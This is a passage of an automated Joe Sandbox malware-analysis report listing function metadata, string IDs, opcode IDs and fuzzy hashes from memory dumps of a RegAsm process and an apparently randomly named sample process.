                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA51EE709042469EDB25CFA8D88E6EFBFF4BB5A308F04846ED955A7391C7359A08CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::exception::exception.LIBCONCRTD ref: 0041FF7F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::exception::exception
                                                                                                                                                                                                                                          • String ID: parse error$parse_error
                                                                                                                                                                                                                                          • API String ID: 2807920213-1820534363
                                                                                                                                                                                                                                          • Opcode ID: c3e086383ae5e6746f4e929e96e7b47db0ce7f2a8a831da775b4c0686540b5a3
                                                                                                                                                                                                                                          • Instruction ID: dbc7e88c930106883de65f009fb68dc6d8aa6a240a0e2e8309194fed98a0f7f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e086383ae5e6746f4e929e96e7b47db0ce7f2a8a831da775b4c0686540b5a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F151EE75D00248AFCB04DF95D891AEEBBB5BF48304F10C19EE90A6B351DB746A85CF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00548816
                                                                                                                                                                                                                                            • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::shared_ptr
                                                                                                                                                                                                                                          • String ID: amp$cpu
                                                                                                                                                                                                                                          • API String ID: 2125921051-2542064945
                                                                                                                                                                                                                                          • Opcode ID: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
                                                                                                                                                                                                                                          • Instruction ID: 896c4ba004cd65ef6f763240b3cdf26fd80aec3528ec41c2a5a41c97531dc988
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3deb029589026f158f5dfa05afecc3c861656cb5e50e3f143fe27a08a4a62530
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96318E75D002199FCB08DF98D855AFEBFF4FB89308F50946AE545A7281DB309A44CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::
                                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                                          • API String ID: 1333004437-3554254475
                                                                                                                                                                                                                                          • Opcode ID: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
                                                                                                                                                                                                                                          • Instruction ID: cfba32f82a06b1ae547287a4b51561787bedcfb965af2065dbc01e39e5182c2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a03ef680b9cb1b220ebf54a6322b2d276013e43f7fe24a9ca7688f7eb00eaf59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98219D78908209AFDF04DFA4EC06AEC7FB1FB49308F148499F9459B251C7B19A85DF40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040E314
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E3C1
                                                                                                                                                                                                                                            • Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540110
                                                                                                                                                                                                                                            • Part of subcall function 005400F1: _Yarn.LIBCPMT ref: 00540134
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
                                                                                                                                                                                                                                          • Instruction ID: 03bdc895a0f5d6872fa9838c6808d5c4a4255a01d2d8090fabff2f5e12dd2b28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76ee383a0a995e39bfa16aa8301b5174875aea1b19ae8f83a7f9ccfc5e6fa2fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 983128B4E04209DFCB04CF98C991BAEFBB1FF48304F248199D805AB381C7749A41CBA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                                                                                                          • String ID: eVA$eVA
                                                                                                                                                                                                                                          • API String ID: 2001391462-2010160217
                                                                                                                                                                                                                                          • Opcode ID: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                          • Instruction ID: 9ab3e6916cf0d860965d67e495f956fdb17b34ad4b651c815909af831e30d601
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2531AA74A04208EFDB04CF98D094BEEB7B5BF48344F2481A9D8489B346D775AE85DF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::Name::operator+=
                                                                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                                                                          • API String ID: 2247604192-3531332078
                                                                                                                                                                                                                                          • Opcode ID: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
                                                                                                                                                                                                                                          • Instruction ID: 1f39a911ced60626433c28cc442ee7e4056fd6b043f7a312c73414e0e6e33478
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a68211051f628c7579dd7c2b5ea19785b96c7caec05f1625b87c04ae9c91e5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A1154B594061AABCF05EFA5D889AEEBFB8FF44308F004545E40267282EB705744CF50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041557C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
                                                                                                                                                                                                                                          • Instruction ID: 08a490f52de3c5040edce6788ffc0187c784e8b8f2f34fffafd03698af9bd941
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e302d00108528a46a1a35d2a8de7e09fc91640628536632f79a55e4ed24a067c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59F0FFB1D00209AFCF04DFACD95599DBFB5AB42301F9041A9E405BF345DA35AF50CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004155EC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
                                                                                                                                                                                                                                          • Instruction ID: 88ab926aff57d90664ab7922b7cb5e9842be8a8fca64f07861ea22d7cb8f09c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59deb7a67acbc6248ceb8a90021aff4319b00112a47edc3c4de445c96a7d9c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF049B1E00108AFCB04DFACDD559AEBFB0EB81302F508199E404BB345DA35AE50CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041582C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
                                                                                                                                                                                                                                          • Instruction ID: 23a3a7d8c62d0292b920b79e1ea0a251c9e9b4556a0ed5d76f89befb81dade5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f949b47fbd6e0024f454bf7937cf18c8f160b7d410d04c0916410c561404fd23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F04FB1E0010CEFCB04DFACD95599DBFB0AB81301F9041A9E845BB346DA359E50CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004157BC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
                                                                                                                                                                                                                                          • Instruction ID: 69ef72a416037fdf3149eeaf2e42ed360d816649ee5327dd42f27257b19032d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d49c7bd113372ec12445a8242aef31acc07b681a11d04ef2080a64199a2ab69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F04FB1E00208EFCB04DFE8D95599EBFB4BB41341F208199E404BB355DA31AE50CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::
                                                                                                                                                                                                                                          • String ID: LV${flat}
                                                                                                                                                                                                                                          • API String ID: 1333004437-3196673279
                                                                                                                                                                                                                                          • Opcode ID: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
                                                                                                                                                                                                                                          • Instruction ID: bd933459744bc577db08b3ea40e9fedb6cd0767b7467071f502a0e930009793d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 805b04ba5fe45dbc9f5681ca1f32bc76c11c8952404d32696616745abd5b6bea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F065B4504209EFD700DF84C857BDB3FE4BB06348F104155AA49DF242DBB0A984DB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041587D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
                                                                                                                                                                                                                                          • Instruction ID: 9a51a63163f444b2d5d531d0c02e56d26d9bbaf05a32c5ba3a563b95f0821741
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a31028c2734aaa7f2df6b62a4badb225951a77dcbd4ca5462a77be9aca45d3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE065F5904208EBCB04DF84D9518AD7BB4BB46301F504098F9046B351D6329F10D764
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00415A43
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
                                                                                                                                                                                                                                          • Instruction ID: 07d823033d411da519a8fa3d30cda9104c39d0445e64d8b7c4167539fe653b04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0960f7a3dde3f673cb292974b9c3c2cdc03891b5d4733d1f7e33650c8e19b30
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E01AB4D01108EBCF04EF98D9515ADBFB4EF8630AF600199D944AB341DA716E508BA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b50bba17503471430a5dc7cf88656660517641b21ca38356572aab999a10bc41
                                                                                                                                                                                                                                          • Instruction ID: 321eba34e9bf185334a20460e4ac74e88768d2508ad62534134b7549b653a876
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b50bba17503471430a5dc7cf88656660517641b21ca38356572aab999a10bc41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8812674E002198FEB65DF65C858BEEBBB5FB58314F0080EAD819A73A4DB705E808F50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d353f8feb330b4fb977f7b3e8936d7831ec7e3a0444f03f73b842e6dbbc43f2a
                                                                                                                                                                                                                                          • Instruction ID: c585febf5a1a60b551a8c04bf844c7cfa7e1e4ab879c23aefd2b102fc29d36e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d353f8feb330b4fb977f7b3e8936d7831ec7e3a0444f03f73b842e6dbbc43f2a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49719E74A01228CFEB64DF64D954B9DBBB6BB49314F1080EAD90EA33A4DB305E84CF51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9ce07c1e604355d946a88b3906cd647def199617f54fec6bb0d611fc903f81d3
                                                                                                                                                                                                                                          • Instruction ID: b1fc9e69e7828536275390b10cd20fd2d4eefae0ccff1b88aae89b7c3b32edc2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ce07c1e604355d946a88b3906cd647def199617f54fec6bb0d611fc903f81d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF412374D00209CFDF02DFAAD848AAEBBF5BF48345F00842AD456A73A4E774A945CF52
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6f56cad540ba83730d76c7cd524757eaef297e5a89d6f6731aaa89a5d3452555
                                                                                                                                                                                                                                          • Instruction ID: bba31fae41a1042753e1f20bdba2d006acfeec8e4531981e6227093be5048731
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f56cad540ba83730d76c7cd524757eaef297e5a89d6f6731aaa89a5d3452555
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C411274D00208CFDB42DFA9E848AEEBBF5BF49345F00842AD456A73A4E7746945CF52
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5bd160ef789dafa8d6c6788e90448ac5037b2b7698b270ee981a1029aab83e4b
                                                                                                                                                                                                                                          • Instruction ID: 7ac84a7799b5b3704c0ba77813162f41bec0d3f85f74c3c9c281df1fb9471ffd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bd160ef789dafa8d6c6788e90448ac5037b2b7698b270ee981a1029aab83e4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33118834D04209CFCB45CFA9D8446AEBBF5FF89311F00846AC80AA3265DB345901CF62
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: da60e86fe11214df6df09062babbb464512d3fdf8b05ef94e52e0e283367c3d1
                                                                                                                                                                                                                                          • Instruction ID: 1d765b8dc17f33753c385f12b535c6976f612e2cedb056edbf20e160815d1e3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da60e86fe11214df6df09062babbb464512d3fdf8b05ef94e52e0e283367c3d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C113774D00209DFDB04DFAAD8086AEBBF5FF89301F00842AC509A33A4DB705901CF91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8044998e5268a683b4e558d817f16652645551e95e12ba311f650e5ab3623970
                                                                                                                                                                                                                                          • Instruction ID: 8febefee427ade82d1f5f594517eb6569f19b544791057b66d0d779a2e4e67ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8044998e5268a683b4e558d817f16652645551e95e12ba311f650e5ab3623970
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8018B30949344CFEBA2CBB994547AABBF4EF46368F1080FAC849972A1D7344985CB21
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62d0fcf23943614e5598fb86e2a63308c4e3fe6bb14a95e4aeaa7bcedb026d75
                                                                                                                                                                                                                                          • Instruction ID: 8f078b044aefb6cd42cd283e0e57b6eeef8cbf5da7ae161082dd1f5dbad4d9de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d0fcf23943614e5598fb86e2a63308c4e3fe6bb14a95e4aeaa7bcedb026d75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E06D6285D3818FD7A38A75A8147A63FE8BB03255F0205FBD044C71A3E37189408751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a74f5a9386f31e380e606e89ac99093e99c286170757d832e2495f4e4faa3aa
                                                                                                                                                                                                                                          • Instruction ID: 4aea9cf2ed7fb65e8052809d1756b849fbd6fa8ed6df1e2e55cab94dea6d562d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a74f5a9386f31e380e606e89ac99093e99c286170757d832e2495f4e4faa3aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF04930915345CFDB82CFBD98542ADBFF0AF06211F14C4A6C849D3261E7308A408B12
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 41649eae1c46e71f7c65bc6874ad52f48375f72296d7b49ed48da282fac4bfc8
                                                                                                                                                                                                                                          • Instruction ID: 4ee04476c231487616e459d13d2db9c199b8b78fe8b7e1a2f5684b6589f63eb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41649eae1c46e71f7c65bc6874ad52f48375f72296d7b49ed48da282fac4bfc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F02B30C04349DFEB62DBB9A40477ABEF8A70234CF4040BAC809D32B5E7314584C751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.1886622426.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_1400000_j6V5568MqaTghErAlfE30BBB.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 455def93571543b7dd41821d37382e32fbe6e09e0d9bac1dc4ccd74a92020497
                                                                                                                                                                                                                                          • Instruction ID: 91249d565f4286f4cb857ab9da4c61547b013a45c4f80f9591c7ea552098147a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 455def93571543b7dd41821d37382e32fbe6e09e0d9bac1dc4ccd74a92020497
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE0DF32904704DBE751DFBB9504B1BB6FDBF45281F0084BAE508C3271E770CA008691
                                                                                                                                                                                                                                          Memory Dump Source
